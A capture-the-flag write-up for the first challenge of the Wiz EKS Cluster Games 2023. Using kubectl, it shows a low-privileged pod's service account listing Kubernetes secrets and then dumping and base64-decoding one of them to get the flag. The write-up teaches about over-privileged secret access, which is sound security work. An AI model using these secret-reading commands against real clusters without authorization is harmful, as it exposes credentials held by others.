EKS Cluster Games 2023

EKS Cluster Games 2023 - Challenge 1

Challenge #1: Secret Seeker

Introduction

You’ve hacked into a low-privileged AWS EKS pod. Use the web terminal below to find flags across the environment. Each challenge runs in a different Kubernetes namespaces with varying permissions.

All K8s resources are crucial; challenges are based on real EKS misconfigurations and security issues.

Click “Begin Challenge” on your desktop, and for guidance, click the question mark icon for useful cheat sheet.

Good luck!

Overview

There are 5 challenges in total. Each challenge can only be attempted when previous challenge is solved.

Challenge #1: Secret Seeker

Scenario

Jumpstart your quest by listing all the secrets in the cluster. Can you spot the flag among them?

Walkthrough

The challenge title is pretty much self-explanatory whereby we are asked to retrieve a secret in this cluster. So let’s get started!

Every challenge page has this button - “View Permission”. This allows us to view permissions granted to the current service account.

EKS Cluster Games!

For this challenge, we are granted with read secret permission:

1
2
3
4
5
6

{
    "secrets": [
        "get",
        "list"
    ]
}

Before we start solving the challenge, let’s look at the kube configuration:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

root@wiz-eks-challenge:~# kubectl config view
apiVersion: v1
clusters:
- cluster:
    certificate-authority: /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
    server: https://10.100.0.1
  name: localcfg
contexts:
- context:
    cluster: localcfg
    namespace: challenge1
    user: user
  name: localcfg
current-context: localcfg
kind: Config
preferences: {}
users:
- name: user
  user:
    token: REDACTED

The cluster is named localcfg and the default namespace for user - user is challenge1 namespace. Now we can run the following command to get secrets in this namespace.

1
2
3

root@wiz-eks-challenge:~# kubectl get secrets
NAME         TYPE     DATA   AGE
log-rotate   Opaque   1      37h

We can see log-rotate secret and let’s dump out the secret content.

1
2

root@wiz-eks-challenge:~# kubectl get secrets log-rotate -ojsonpath='{.data.flag}' | base64 -d
wiz_eks_challenge{omg_over_privileged_secret_access}

Awesome! That is the flag for challenge #1. Now we can move on to the next challenge.